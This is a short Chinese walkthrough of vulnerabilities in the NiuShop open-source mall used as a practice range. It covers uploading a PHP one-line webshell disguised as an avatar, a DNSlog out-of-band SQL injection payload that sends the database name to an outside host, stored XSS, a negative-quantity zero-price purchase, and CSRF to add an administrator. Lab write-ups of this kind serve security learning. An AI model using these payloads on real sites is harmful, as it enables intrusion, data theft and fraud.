niushop开源商城靶场漏洞

文件上传漏洞

先注册一个账号

来到个人信息修改个人头像

选择我们的马

#一句话(不想麻烦的选择一句话也可以)

<?php @eval($_POST["cmd"]);?>

#生成h.php文件

<?php

fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>');

?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的h.php就行

SQL注入漏洞

我们查看后台寻找功能点发现有一个地方可以执行 sql 命令

我们输入一个 sql 语句

发现没有回显,这时我们可以考虑使用外带注入

(select load_file(concat('\\\\',(select (database())),'96toab.dnslog.cn.dnslog.cn\\abc')))

得到数据库的名字为 niushop_b2c

获取表名

XSS漏洞

后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为-1

后面全部放行就OK了

CSRF漏洞

下载源码;制作添加管理员链接

添加管理员用户

BP抓包;制作SCRF

复制下来制作链接

admin管理员在已登录的状态点击我们的链接

相关推荐
这我可不懂6 小时前
低代码开发是传统开发的替代,还是补充?
科技·低代码·开源
说私域10 小时前
开源AI智能名片2 + 1链动模式S2B2C商城小程序:内容价值创造与传播新引擎
人工智能·小程序·开源·流量运营
月婵婵11 小时前
【翻译+论文阅读】DeepSeek-R1评测:粉碎GPT-4和Claude 3.5的开源AI革命
人工智能·开源
Azure DevOps17 小时前
Azure DevOps Server:集成奇安信开源卫士(OpenSourceSafe)
运维·microsoft·开源·azure·devops
wn53117 小时前
【编程简史:Eclipse 之物联网】
java·物联网·程序人生·eclipse·开源
kcarly18 小时前
开源项目介绍-词云生成
开源·wordcloud·词云·stylecloud·kumo·wormicloud·wordcram
老马啸西风1 天前
IM 即时通讯系统-46-OpenIM 提供了专为开发者设计的开源即时通讯解决方案
java·分布式·开源·im
kcarly1 天前
开源数据分析工具 RapidMiner
数据挖掘·数据分析·开源
程序员光一1 天前
2周2.5k星! 网络问题排查神器 kyanos 介绍
后端·开源·github
华为云PaaS服务小智1 天前
开源安全一站式构建!开启企业开源治理新篇章
安全·开源·华为云